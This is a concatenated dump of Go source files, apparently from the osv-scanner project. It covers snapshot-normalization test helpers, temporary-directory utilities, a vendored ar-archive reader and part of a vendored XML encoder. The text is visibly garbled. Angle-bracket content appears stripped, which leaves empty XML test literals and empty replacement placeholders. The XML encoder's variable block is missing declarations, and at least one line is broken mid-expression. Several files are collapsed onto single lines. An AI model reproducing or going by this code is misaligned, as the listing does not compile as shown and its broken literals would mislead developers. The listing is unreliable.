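		w.WriteHeader(http.StatusUnauthorized)
		resp = []byte("unauthorized")
	} else if !ok {
		w.WriteHeader(http.StatusNotFound)
		resp = []byte("not found")
	}

	if _, err := w.Write(resp); err != nil {
		log.Fatalf("Write: %v", err)
	}
}

================================================
FILE: internal/testutility/normalize.go
================================================
package testutility

import (
	"bufio"
	"os"
	"path/filepath"
	"regexp"
	"runtime"
	"strings"
	"testing"

	"github.com/google/osv-scanner/v2/internal/cachedregexp"
)

// normalizeFilePathsOnOutput normalizes file paths in the given `output`, one
// line at a time.
//
// Lines of at most 250 characters are passed through normalizeFilePaths. Longer
// lines (for example a long SARIF/JSON output) only have their escaped
// backslashes replaced. The result ends with a newline only if `output` did.
func normalizeFilePathsOnOutput(t *testing.T, output string) string {
	t.Helper()

	builder := strings.Builder{}
	scanner := bufio.NewScanner(strings.NewReader(output))

	// bufio.Scanner stops at the first line that exceeds its token limit
	// (bufio.MaxScanTokenSize by default), which would silently drop the rest
	// of the output from the comparison. Size the limit so that every line of
	// `output` fits.
	scanner.Buffer(make([]byte, 0, 4096), len(output)+1)

	for scanner.Scan() {
		text := scanner.Text()

		if len(text) <= 250 {
			text = normalizeFilePaths(t, text)
		}

		// Always replace \\ because it could be in a long SARIF/JSON output
		text = strings.ReplaceAll(text, "\\\\", "/")

		builder.WriteString(text)
		builder.WriteString("\n")
	}

	// A scan failure means the normalized output is incomplete; report it
	// rather than comparing a truncated snapshot.
	if err := scanner.Err(); err != nil {
		t.Errorf("could not scan output (%v) - results and diff might be inaccurate!", err)
	}

	// Match ending new line
	if strings.HasSuffix(output, "\n") {
		return builder.String()
	}

	return strings.TrimSuffix(builder.String(), "\n")
}

// normalizeFilePaths attempts to normalize any file paths in the given `output`
// so that they can be compared reliably regardless of the file path separator
// being used.
//
// Namely, escaped backslashes and single backslashes are replaced with forward slashes.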
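func normalizeFilePaths(t *testing.T, output string) string {
	t.Helper()

	// Collapse escaped backslashes first, so that a `\\` pair becomes a single
	// "/" rather than two.
	withoutEscaped := strings.ReplaceAll(output, "\\\\", "/")

	return strings.ReplaceAll(withoutEscaped, "\\", "/")
}

// normalizeRootDirectory attempts to replace references to the current working
// directory with "", in order to reduce the noise of the cmp diff
//
// NOTE(review): the replacement literals in this file read as empty strings
// here; if they are meant to be placeholder tokens, confirm them against the
// repository before relying on this listing.
func normalizeRootDirectory(t *testing.T, str string) string {
	t.Helper()

	cwd := normalizeFilePaths(t, GetCurrentWorkingDirectory(t))

	// file uris with Windows end up with three slashes, so we normalize that too
	str = strings.ReplaceAll(str, "file:///"+cwd, "file://")
	str = strings.ReplaceAll(str, cwd, "")

	// Replace versions without the root as well
	return strings.ReplaceAll(str, pathWithoutRoot(t, cwd), "")
}

// normalizeUserCacheDirectory attempts to replace references to the user cache
// directory with "", in order to reduce the noise of the cmp diff
//
// If the cache directory cannot be determined the test is marked as failed and
// `str` is returned unchanged.
func normalizeUserCacheDirectory(t *testing.T, str string) string {
	t.Helper()

	cacheDir, err := os.UserCacheDir()
	if err != nil {
		t.Errorf("could not get user cache (%v) - results and diff might be inaccurate!", err)

		// With an empty cacheDir the replacements below would rewrite every
		// "file:///" prefix and match the empty string throughout `str`.
		return str
	}

	cacheDir = normalizeFilePaths(t, cacheDir)

	// file uris with Windows end up with three slashes, so we normalize that too
	str = strings.ReplaceAll(str, "file:///"+cacheDir, "file://")

	return strings.ReplaceAll(str, cacheDir, "")
}

// normalizeTempDirectory attempts to replace references to the temp directory
// with "", to ensure tests pass across different OSs
//
// Only paths of the form <temp dir>/osv-scanner-test-<digits> are matched, with
// and without the leading root of the temp directory.
func normalizeTempDirectory(t *testing.T, str string) string {
	t.Helper()

	//nolint:gocritic // ensure that the directory doesn't end with a trailing slash
	tempDir := normalizeFilePaths(t, filepath.Join(os.TempDir()))

	// The directory is quoted so that any regex metacharacters in it are matched literally.
	re := cachedregexp.MustCompile(regexp.QuoteMeta(tempDir+`/osv-scanner-test-`) + `\d+`)
	str = re.ReplaceAllString(str, "")

	// Replace versions without the root as well
	re = cachedregexp.MustCompile(regexp.QuoteMeta(pathWithoutRoot(t, tempDir)+`/osv-scanner-test-`) + `\d+`)

	return re.ReplaceAllString(str, "")
}

// normalizeErrors attempts to replace error messages on alternative OSs with their
// known linux equivalents, to ensure tests pass across different OSs
func normalizeErrors(t *testing.T, str string) string {
	t.Helper()

	// Applied in order; each pair is (text to find, linux equivalent).
	str = strings.ReplaceAll(str, "The filename, directory name, or volume label syntax is incorrect.", "no such file or directory")
	str = strings.ReplaceAll(str, "The system cannot find the path specified.", "no such file or directory")
	str = strings.ReplaceAll(str, "The system cannot find the file specified.", "no such file or directory")
	str = strings.ReplaceAll(str, "CreateFile", "lstat")
	str = strings.ReplaceAll(str, "\nstat ./testdata/", "\nlstat ./testdata/")
	str = strings.ReplaceAll(str, "GetFileAttributesEx", "stat")

	return str
}

// removeUntestableLines removes lines from the output that are not testable,
// currently the notice printed while a docker image is being pulled
func removeUntestableLines(t *testing.T, str string) string {
	t.Helper()

	replacer := regexp.MustCompile(`Image not found locally, pulling docker image .*\.\.\.\n`)
	str = replacer.ReplaceAllLiteralString(str, "")

	return str
}

// normalizeSnapshot applies a series of normalizers, in a fixed order, to the
// buffer from a std stream like stdout and stderr
func normalizeSnapshot(t *testing.T, str string) string {
	t.Helper()

	for _, normalizer := range []func(t *testing.T, str string) string{
		normalizeFilePathsOnOutput,
		normalizeRootDirectory,
		normalizeTempDirectory,
		normalizeUserCacheDirectory,
		normalizeErrors,
		removeUntestableLines,
	} {
		str = normalizer(t, str)
	}

	return str
}

// pathWithoutRoot returns str with its leading root removed: a leading "/", or
// on Windows the volume name plus one separator character. It returns "" if
// str is shorter than the root that would be removed.
func pathWithoutRoot(t *testing.T, str string) string {
	t.Helper()

	// Only the length of root is used, so it does not matter whether the
	// separator after the volume name in str is "\" or "/".
	var root string
	if runtime.GOOS == "windows" {
		root = filepath.VolumeName(str) + "\\"
	}

	if strings.HasPrefix(str, "/") {
		root = "/"
	}

	// Guard the slice below: a bare volume name (or an empty string on Windows)
	// is shorter than the computed root.
	if len(root) > len(str) {
		return ""
	}

	return str[len(root):]
}

================================================
FILE: internal/testutility/snapshot.go
================================================
package testutility

import (
	"encoding/json"
	"testing"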
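"github.com/gkampitakis/go-snaps/snaps"
)

// Snapshot is a small value-type builder around go-snaps that carries the
// replacements to apply to output when running on Windows.
type Snapshot struct {
	// windowsReplacements maps text to find -> text to substitute
	windowsReplacements map[string]string
}

// NewSnapshot creates a snapshot that can be passed around within tests
func NewSnapshot() Snapshot {
	return Snapshot{windowsReplacements: map[string]string{}}
}

// WithWindowsReplacements adds a map of strings with values that they should be
// replaced within before comparing the snapshot when running on Windows
//
// The given map replaces any replacements set previously.
func (s Snapshot) WithWindowsReplacements(replacements map[string]string) Snapshot {
	s.windowsReplacements = replacements

	return s
}

// WithCRLFReplacement adds a Windows replacement for "\r\n" to "\n".
// This should be called after WithWindowsReplacements if used together.
//
// The replacements are copied before the entry is added, so neither the
// receiver nor a map passed to WithWindowsReplacements is modified, and a nil
// map is handled.
func (s Snapshot) WithCRLFReplacement() Snapshot {
	merged := make(map[string]string, len(s.windowsReplacements)+1)
	for match, replacement := range s.windowsReplacements {
		merged[match] = replacement
	}
	merged["\r\n"] = "\n"

	s.windowsReplacements = merged

	return s
}

// MatchJSON asserts the existing snapshot matches what was gotten in the test,
// after being marshalled as JSON
func (s Snapshot) MatchJSON(t *testing.T, got any) {
	t.Helper()

	j, err := json.MarshalIndent(got, "", " ")
	if err != nil {
		t.Fatalf("Failed to marshal JSON: %s", err)
	}

	snaps.MatchSnapshot(t, normalizeRootDirectory(t, applyWindowsReplacements(string(j), s.windowsReplacements)))
}

// MatchText asserts the existing snapshot matches what was gotten in the test
func (s Snapshot) MatchText(t *testing.T, got string) {
	t.Helper()

	snaps.MatchSnapshot(t, normalizeSnapshot(t, applyWindowsReplacements(got, s.windowsReplacements)))
}

================================================
FILE: internal/testutility/utility.go
================================================
package testutility

import (
	"flag"
	"fmt"
	"math/rand"
	"os"
	"path/filepath"
	"runtime"
	"strings"
	"testing"

	"github.com/gkampitakis/go-snaps/snaps"
)

// GetCurrentWorkingDirectory returns the current working directory, raising
// a fatal error if it cannot be retrieved for some reason
func GetCurrentWorkingDirectory(t *testing.T) string {
	t.Helper()

	dir, err := os.Getwd()
	if err != nil {
		t.Fatalf("failed to get current directory: %v", err)
	}

	return dir
}

// applyWindowsReplacements will replace any matching strings if on Windows
//
// The replacements are applied in map iteration order, which Go does not fix;
// entries whose match text overlaps can therefore give differing results.
func applyWindowsReplacements(content string, replacements map[string]string) string {
	if runtime.GOOS == "windows" {
		for match, replacement := range replacements {
			content = strings.ReplaceAll(content, match, replacement)
		}
	}

	return content
}

// CleanSnapshots ensures that snapshots are relevant and sorted for consistency
//
// The process exits with status 1 if cleaning fails or if any snapshot was
// found to be outdated.
func CleanSnapshots(m *testing.M) {
	dirty, err := snaps.Clean(m, snaps.CleanOpts{Sort: true})

	if err != nil {
		fmt.Println("Error cleaning snaps:", err)
		os.Exit(1)
	}

	if dirty {
		fmt.Println("Some snapshots were outdated.")
		os.Exit(1)
	}
}

// Skip is equivalent to t.Log followed by t.SkipNow, but allows tracking of
// what snapshots are skipped so that they're not marked as obsolete
func Skip(t *testing.T, args ...any) {
	t.Helper()

	snaps.Skip(t, args...)
}

// isThisTestRunTarget tries to determine if the currently running test has been
// targeted with the -run flag, by comparing the flags value to [testing.T.Name]
//
// Since this just does a direct comparison, it will not match for regex patterns.
// It reports false if the test.run flag is not registered.
func isThisTestRunTarget(t *testing.T) bool {
	t.Helper()

	runFlag := flag.Lookup("test.run")
	if runFlag == nil {
		return false
	}

	// Only the part before the first "/" (the top-level test) is compared.
	runOnly, _, _ := strings.Cut(runFlag.Value.String(), "/")
	runOnlyWithNoRegex := strings.Trim(runOnly, "^$")

	return runOnly == t.Name() || runOnlyWithNoRegex == t.Name()
}

// IsAcceptanceTesting returns true if the test suite is being run with acceptance tests enabled
func IsAcceptanceTesting() bool {
	return os.Getenv("TEST_ACCEPTANCE") == "true"
}

// SkipIfNotAcceptanceTesting marks the test as skipped unless the test suite is
// being run with acceptance tests enabled, as indicated by IsAcceptanceTesting,
// or the test is being run specifically with the -run flag
// This is used to skip tests that could require external dependencies other than go
func SkipIfNotAcceptanceTesting(t *testing.T, reason string) {
	t.Helper()

	if !IsAcceptanceTesting() && !isThisTestRunTarget(t) {
		Skip(t, "Skipping extended test: ", reason)
	}
}

// SkipIfShort marks the test as skipped if the short flag is set, unless the
// test is being run specifically with the -run flag
func SkipIfShort(t *testing.T) {
	t.Helper()

	if testing.Short() && !isThisTestRunTarget(t) {
		Skip(t, "Skipping long test: ", "Takes a while to run")
	}
}

// ValueIfOnWindows returns win when running on Windows, and or otherwise
func ValueIfOnWindows(win, or string) string {
	if runtime.GOOS == "windows" {
		return win
	}

	return or
}

// fixedLengthTempDir creates a directory named "osv-scanner-test-" followed by
// a zero-padded 12-digit number inside parent, and returns its path together
// with any error from creating it.
//
// The suffix comes from math/rand and is not unpredictable. The directory is
// created with os.Mkdir, which fails if the path already exists, and with mode
// 0o700, so a name that is already taken results in an error instead of the
// existing entry being reused.
func fixedLengthTempDir(parent string) (string, error) {
	n := rand.Int63n(1_000_000_000_000) //nolint:gosec // 10^12
	suffix := fmt.Sprintf("%0*d", 12, n)
	name := "osv-scanner-test-" + suffix
	path := filepath.Join(parent, name)

	return path, os.Mkdir(path, 0o700)
}

// CreateTestDir makes a temporary directory for use in testing that involves
// writing and reading files from disk, which is automatically cleaned up
// when testing finishes
func CreateTestDir(t *testing.T) string {
	t.Helper()

	p, err := fixedLengthTempDir(os.TempDir())
	if err != nil {
		t.Fatalf("could not create test directory: %v", err)
	}

	// ensure the test directory is removed when we're done testing
	t.Cleanup(func() {
		_ = os.RemoveAll(p)
	})

	return p
}

================================================
FILE: internal/thirdparty/ar/COPYING
================================================
Copyright (c) 2013 Blake Smith

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.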
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: internal/thirdparty/ar/reader.go ================================================ // Copyright (c) 2013 Blake Smith // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. 
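// Modified under Apache License

package ar

import (
	"bytes"
	"errors"
	"io"
	"strconv"
	"strings"
)

const (
	// HeaderByteSize is the fixed size in bytes of the header that precedes
	// every entry in an ar archive.
	HeaderByteSize = 60
	// ArSignature is the 8-byte global header that every ar archive starts with.
	ArSignature = "!<arch>\n"
)

// Header holds the per-entry header fields this reader extracts.
type Header struct {
	Name string // entry name with trailing spaces removed
	Size int    // entry data size in bytes, from the header's decimal size field
}

// slicer is a cursor over a byte slice that hands out consecutive fields.
type slicer []byte

// next returns the first n bytes and advances the slicer past them.
// It panics if fewer than n bytes remain; readHeader only asks for fixed
// widths that add up to less than HeaderByteSize.
func (sp *slicer) next(n int) []byte {
	s := *sp
	b := s[0:n]
	*sp = s[n:]

	return b
}

// Reader provides read access to an ar archive.
// Call Next to move to the next entry; unread data of the current entry is skipped.
//
// The archive is treated as untrusted input: an entry header whose size field
// is not a non-negative decimal number makes Next return an error.
//
// Example:
//
//	reader, err := NewReader(f)
//	if err != nil {
//		t.Fatal(err)
//	}
//	var buf bytes.Buffer
//	for {
//		_, err := reader.Next()
//		if err == io.EOF {
//			break
//		}
//		if err != nil {
//			t.Fatal(err)
//		}
//		io.Copy(&buf, reader)
//	}
type Reader struct {
	r           io.Reader
	bytesToRead int // unread bytes left in the current entry
	pad         int // padding bytes that follow the current entry's data
}

// NewReader returns a Reader for the ar archive in r. It consumes the global
// ar header and returns an error if r does not start with ArSignature.
func NewReader(r io.Reader) (*Reader, error) {
	sigBuf := bytes.Buffer{}

	// A short or failed read leaves sigBuf different from the signature, so
	// the comparison below rejects it.
	_, _ = io.CopyN(&sigBuf, r, 8) // Discard global header

	if sigBuf.String() != ArSignature {
		return nil, errors.New("not an rlib archive")
	}

	return &Reader{r: r}, nil
}

// Call Next() to skip to the next file in the archive file.
// Returns a Header which contains the metadata about the
// file in the archive.
//
// It returns io.EOF when the archive ends exactly at an entry boundary, and
// another error if the next header is truncated or malformed.
func (rd *Reader) Next() (*Header, error) {
	err := rd.skipUnread()
	if err != nil {
		return nil, err
	}

	return rd.readHeader()
}

// Read data from the current entry in the archive.
// It returns io.EOF once the entry's data has been consumed, and never reads
// past the size declared in the entry's header.
func (rd *Reader) Read(b []byte) (n int, err error) {
	// <= rather than ==: a non-positive remainder must never reach the slice
	// expression below.
	if rd.bytesToRead <= 0 {
		return 0, io.EOF
	}

	if len(b) > rd.bytesToRead {
		b = b[0:rd.bytesToRead]
	}

	n, err = rd.r.Read(b)
	rd.bytesToRead -= n

	return
}

// skipUnread advances the underlying reader past whatever is left of the
// current entry, including its padding, seeking when the reader supports it.
func (rd *Reader) skipUnread() error {
	bytesToSkip := int64(rd.bytesToRead + rd.pad)
	rd.bytesToRead, rd.pad = 0, 0

	if seeker, ok := rd.r.(io.Seeker); ok {
		_, err := seeker.Seek(bytesToSkip, io.SeekCurrent)

		return err
	}

	_, err := io.CopyN(io.Discard, rd.r, bytesToSkip)

	return err
}

// readHeader reads and parses the next entry header, and records how many data
// and padding bytes follow it.
//
// The size field comes straight from the archive. It is rejected unless it is
// a non-negative decimal number: a negative size would make Read slice with a
// negative bound, and would make skipUnread seek backwards so that the same
// header is parsed again.
func (rd *Reader) readHeader() (*Header, error) {
	headerBuf := make([]byte, HeaderByteSize)
	if _, err := io.ReadFull(rd.r, headerBuf); err != nil {
		return nil, err
	}

	s := slicer(headerBuf)

	name := byteToString(s.next(16))

	// Skip the next 4 fields, we only need name and size
	s.next(12 + 6 + 6 + 8)

	size, err := strconv.Atoi(byteToString(s.next(10)))
	if err != nil || size < 0 {
		return nil, errors.New("ar: invalid entry size in header")
	}

	rd.bytesToRead = size
	// Entries with an odd size are followed by one padding byte.
	rd.pad = size % 2

	return &Header{Name: name, Size: size}, nil
}

// byteToString converts a fixed-width header field to a string, dropping the
// trailing spaces used as padding.
func byteToString(b []byte) string {
	return strings.TrimRight(string(b), " ")
}

// byteToDecimal parses a space-padded decimal header field, returning 0 if it
// is not a valid number.
func byteToDecimal(b []byte) int {
	n, _ := strconv.Atoi(byteToString(b))

	return n
}

================================================
FILE: internal/thirdparty/xml/atom_test.go
================================================
// Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.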
package xml import "time" var atomValue = &Feed{ XMLName: Name{"http://www.w3.org/2005/Atom", "feed"}, Title: "Example Feed", Link: []Link{{Href: "http://example.org/"}}, Updated: ParseTime("2003-12-13T18:30:02Z"), Author: Person{Name: "John Doe"}, ID: "urn:uuid:60a76c80-d399-11d9-b93C-0003939e0af6", Entry: []Entry{ { Title: "Atom-Powered Robots Run Amok", Link: []Link{{Href: "http://example.org/2003/12/13/atom03"}}, ID: "urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a", Updated: ParseTime("2003-12-13T18:30:02Z"), Summary: NewText("Some text."), }, }, } var atomXML = `` + `` + `Example Feed` + `urn:uuid:60a76c80-d399-11d9-b93C-0003939e0af6` + `` + `John Doe` + `` + `Atom-Powered Robots Run Amok` + `urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a` + `` + `2003-12-13T18:30:02Z` + `` + `Some text.` + `` + `` func ParseTime(str string) time.Time { t, err := time.Parse(time.RFC3339, str) if err != nil { panic(err) } return t } func NewText(text string) Text { return Text{ Body: text, } } ================================================ FILE: internal/thirdparty/xml/marshal.go ================================================ // Copyright 2011 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package xml import ( "bufio" "bytes" "encoding" "errors" "fmt" "io" "reflect" "strconv" "strings" ) const ( // Header is a generic XML header suitable for use with the output of [Marshal]. // This is not automatically added to any output of this package, // it is provided as a convenience. Header = `` + "\n" ) // Marshal returns the XML encoding of v. // // Marshal handles an array or slice by marshaling each of the elements. // Marshal handles a pointer by marshaling the value it points at or, if the // pointer is nil, by writing nothing. Marshal handles an interface value by // marshaling the value it contains or, if the interface value is nil, by // writing nothing. 
Marshal handles all other data by writing one or more XML // elements containing the data. // // The name for the XML elements is taken from, in order of preference: // - the tag on the XMLName field, if the data is a struct // - the value of the XMLName field of type [Name] // - the tag of the struct field used to obtain the data // - the name of the struct field used to obtain the data // - the name of the marshaled type // // The XML element for a struct contains marshaled elements for each of the // exported fields of the struct, with these exceptions: // - the XMLName field, described above, is omitted. // - a field with tag "-" is omitted. // - a field with tag "name,attr" becomes an attribute with // the given name in the XML element. // - a field with tag ",attr" becomes an attribute with the // field name in the XML element. // - a field with tag ",chardata" is written as character data, // not as an XML element. // - a field with tag ",cdata" is written as character data // wrapped in one or more tags, not as an XML element. // - a field with tag ",innerxml" is written verbatim, not subject // to the usual marshaling procedure. // - a field with tag ",comment" is written as an XML comment, not // subject to the usual marshaling procedure. It must not contain // the "--" string within it. // - a field with a tag including the "omitempty" option is omitted // if the field value is empty. The empty values are false, 0, any // nil pointer or interface value, and any array, slice, map, or // string of length zero. // - an anonymous struct field is handled as if the fields of its // value were part of the outer struct. // - a field implementing [Marshaler] is written by calling its MarshalXML // method. // - a field implementing [encoding.TextMarshaler] is written by encoding the // result of its MarshalText method as text. // // If a field uses a tag "a>b>c", then the element c will be nested inside // parent elements a and b. 
Fields that appear next to each other that name // the same parent will be enclosed in one XML element. // // If the XML name for a struct field is defined by both the field tag and the // struct's XMLName field, the names must match. // // See [MarshalIndent] for an example. // // Marshal will return an error if asked to marshal a channel, function, or map. func Marshal(v any) ([]byte, error) { var b bytes.Buffer enc := NewEncoder(&b) if err := enc.Encode(v); err != nil { return nil, err } if err := enc.Close(); err != nil { return nil, err } return b.Bytes(), nil } // Marshaler is the interface implemented by objects that can marshal // themselves into valid XML elements. // // MarshalXML encodes the receiver as zero or more XML elements. // By convention, arrays or slices are typically encoded as a sequence // of elements, one per entry. // Using start as the element tag is not required, but doing so // will enable [Unmarshal] to match the XML elements to the correct // struct field. // One common implementation strategy is to construct a separate // value with a layout corresponding to the desired XML and then // to encode it using e.EncodeElement. // Another common strategy is to use repeated calls to e.EncodeToken // to generate the XML output one token at a time. // The sequence of encoded tokens must make up zero or more valid // XML elements. type Marshaler interface { MarshalXML(e *Encoder, start StartElement) error } // MarshalerAttr is the interface implemented by objects that can marshal // themselves into valid XML attributes. // // MarshalXMLAttr returns an XML attribute with the encoded value of the receiver. // Using name as the attribute name is not required, but doing so // will enable [Unmarshal] to match the attribute to the correct // struct field. // If MarshalXMLAttr returns the zero attribute [Attr]{}, no attribute // will be generated in the output. 
// MarshalXMLAttr is used only for struct fields with the // "attr" option in the field tag. type MarshalerAttr interface { MarshalXMLAttr(name Name) (Attr, error) } // MarshalIndent works like [Marshal], but each XML element begins on a new // indented line that starts with prefix and is followed by one or more // copies of indent according to the nesting depth. func MarshalIndent(v any, prefix, indent string) ([]byte, error) { var b bytes.Buffer enc := NewEncoder(&b) enc.Indent(prefix, indent) if err := enc.Encode(v); err != nil { return nil, err } if err := enc.Close(); err != nil { return nil, err } return b.Bytes(), nil } // An Encoder writes XML data to an output stream. type Encoder struct { p printer } // NewEncoder returns a new encoder that writes to w. func NewEncoder(w io.Writer) *Encoder { e := &Encoder{printer{w: bufio.NewWriter(w)}} e.p.encoder = e return e } // Indent sets the encoder to generate XML in which each element // begins on a new indented line that starts with prefix and is followed by // one or more copies of indent according to the nesting depth. func (enc *Encoder) Indent(prefix, indent string) { enc.p.prefix = prefix enc.p.indent = indent } // Encode writes the XML encoding of v to the stream. // // See the documentation for [Marshal] for details about the conversion // of Go values to XML. // // Encode calls [Encoder.Flush] before returning. func (enc *Encoder) Encode(v any) error { err := enc.p.marshalValue(reflect.ValueOf(v), nil, nil) if err != nil { return err } return enc.p.w.Flush() } // EncodeElement writes the XML encoding of v to the stream, // using start as the outermost tag in the encoding. // // See the documentation for [Marshal] for details about the conversion // of Go values to XML. // // EncodeElement calls [Encoder.Flush] before returning. 
func (enc *Encoder) EncodeElement(v any, start StartElement) error { err := enc.p.marshalValue(reflect.ValueOf(v), nil, &start) if err != nil { return err } return enc.p.w.Flush() } var ( begComment = []byte("") endProcInst = []byte("?>") ) // EncodeToken writes the given XML token to the stream. // It returns an error if [StartElement] and [EndElement] tokens are not properly matched. // // EncodeToken does not call [Encoder.Flush], because usually it is part of a larger operation // such as [Encoder.Encode] or [Encoder.EncodeElement] (or a custom [Marshaler]'s MarshalXML invoked // during those), and those will call Flush when finished. // Callers that create an Encoder and then invoke EncodeToken directly, without // using Encode or EncodeElement, need to call Flush when finished to ensure // that the XML is written to the underlying writer. // // EncodeToken allows writing a [ProcInst] with Target set to "xml" only as the first token // in the stream. func (enc *Encoder) EncodeToken(t Token) error { p := &enc.p switch t := t.(type) { case StartElement: if err := p.writeStart(&t); err != nil { return err } case EndElement: if err := p.writeEnd(t.Name, t.Empty); err != nil { return err } case CharData: if t.cdata { p.Write(cdataStart) } if t.origin != nil { // Write the original text if there are escape sequences replaced. p.Write(t.origin) } else { escapeText(p, t.data, false) } if t.cdata { p.Write(cdataEnd) } case Comment: if bytes.Contains(t, endComment) { return fmt.Errorf("xml: EncodeToken of Comment containing --> marker") } p.WriteString("") return p.cachedWriteError() case ProcInst: // First token to be encoded which is also a ProcInst with target of xml // is the xml declaration. The only ProcInst where target of xml is allowed. 
if t.Target == "xml" && p.w.Buffered() != 0 { return fmt.Errorf("xml: EncodeToken of ProcInst xml target only valid for xml declaration, first token encoded") } if !isNameString(t.Target) { return fmt.Errorf("xml: EncodeToken of ProcInst with invalid Target") } if bytes.Contains(t.Inst, endProcInst) { return fmt.Errorf("xml: EncodeToken of ProcInst containing ?> marker") } p.WriteString(" 0 { p.WriteByte(' ') p.Write(t.Inst) } p.WriteString("?>") case Directive: if !isValidDirective(t) { return fmt.Errorf("xml: EncodeToken of Directive containing wrong < or > markers") } p.WriteString("") default: return fmt.Errorf("xml: EncodeToken of invalid token type") } return p.cachedWriteError() } // isValidDirective reports whether dir is a valid directive text, // meaning angle brackets are matched, ignoring comments and strings. func isValidDirective(dir Directive) bool { var ( depth int inquote uint8 incomment bool ) for i, c := range dir { switch { case incomment: if c == '>' { if n := 1 + i - len(endComment); n >= 0 && bytes.Equal(dir[n:i+1], endComment) { incomment = false } } // Just ignore anything in comment case inquote != 0: if c == inquote { inquote = 0 } // Just ignore anything within quotes case c == '\'' || c == '"': inquote = c case c == '<': if i+len(begComment) < len(dir) && bytes.Equal(dir[i:i+len(begComment)], begComment) { incomment = true } else { depth++ } case c == '>': if depth == 0 { return false } depth-- } } return depth == 0 && inquote == 0 && !incomment } // Flush flushes any buffered XML to the underlying writer. // See the [Encoder.EncodeToken] documentation for details about when it is necessary. func (enc *Encoder) Flush() error { return enc.p.w.Flush() } // Close the Encoder, indicating that no more data will be written. It flushes // any buffered XML to the underlying writer and returns an error if the // written XML is invalid (e.g. by containing unclosed elements). 
func (enc *Encoder) Close() error {
	// All of the work is done by the printer's own Close method.
	return enc.p.Close()
}

// printer carries the encoder's output state: the buffered writer, the
// indentation settings, the stack of open element names and the name space
// prefixes that have been declared for attributes.
type printer struct {
	w          *bufio.Writer
	encoder    *Encoder
	seq        int // counter createAttrPrefix uses to make a taken prefix unique
	indent     string
	prefix     string
	depth      int
	indentedIn bool
	putNewline bool
	attrNS     map[string]string // map prefix -> name space
	attrPrefix map[string]string // map name space -> prefix
	prefixes   []string          // declared prefixes; "" entries are the marks pushed by markPrefix
	tags       []Name            // stack of open element names; writeEnd compares against the top
	closed     bool              // set by Close; later writes record "use of closed Encoder"
	err        error             // sticky error: once set, Write/WriteString/WriteByte stop writing
}

// createAttrPrefix finds the name space prefix attribute to use for the given name space,
// defining a new prefix if necessary. It returns the prefix.
//
// Defining a new prefix has a side effect on the output: the xmlns:
// declaration is written immediately, with the name space URL passed through
// EscapeText. The prefix itself is written as-is, so it is only ever a
// candidate accepted by isName (without a colon) or the fallback "_".
func (p *printer) createAttrPrefix(url string) string {
	if prefix := p.attrPrefix[url]; prefix != "" {
		return prefix
	}

	// The "http://www.w3.org/XML/1998/namespace" name space is predefined as "xml"
	// and must be referred to that way.
	// (The "http://www.w3.org/2000/xmlns/" name space is also predefined as "xmlns",
	// but users should not be trying to use that one directly - that's our job.)
	if url == xmlURL {
		return xmlPrefix
	}

	// Need to define a new name space.
	if p.attrPrefix == nil {
		p.attrPrefix = make(map[string]string)
		p.attrNS = make(map[string]string)
	}

	// Pick a name. We try to use the final element of the path
	// but fall back to _.
	prefix := strings.TrimRight(url, "/")
	if i := strings.LastIndex(prefix, "/"); i >= 0 {
		prefix = prefix[i+1:]
	}
	// The candidate comes from the caller-supplied URL; anything isName
	// rejects, or that contains a colon, is replaced rather than written.
	if prefix == "" || !isName([]byte(prefix)) || strings.Contains(prefix, ":") {
		prefix = "_"
	}
	// xmlanything is reserved and any variant of it regardless of
	// case should be matched, so:
	//    (('X'|'x') ('M'|'m') ('L'|'l'))
	// See Section 2.3 of https://www.w3.org/TR/REC-xml/
	if len(prefix) >= 3 && strings.EqualFold(prefix[:3], "xml") {
		prefix = "_" + prefix
	}
	if p.attrNS[prefix] != "" {
		// Name is taken. Find a better one.
		for p.seq++; ; p.seq++ {
			if id := prefix + "_" + strconv.Itoa(p.seq); p.attrNS[id] == "" {
				prefix = id
				break
			}
		}
	}

	p.attrPrefix[url] = prefix
	p.attrNS[prefix] = url

	p.WriteString(`xmlns:`)
	p.WriteString(prefix)
	p.WriteString(`="`)
	EscapeText(p, []byte(url))
	p.WriteString(`" `)

	// Remember the prefix so popPrefix can undeclare it when the element ends.
	p.prefixes = append(p.prefixes, prefix)

	return prefix
}

// deleteAttrPrefix removes an attribute name space prefix.
func (p *printer) deleteAttrPrefix(prefix string) {
	delete(p.attrPrefix, p.attrNS[prefix])
	delete(p.attrNS, prefix)
}

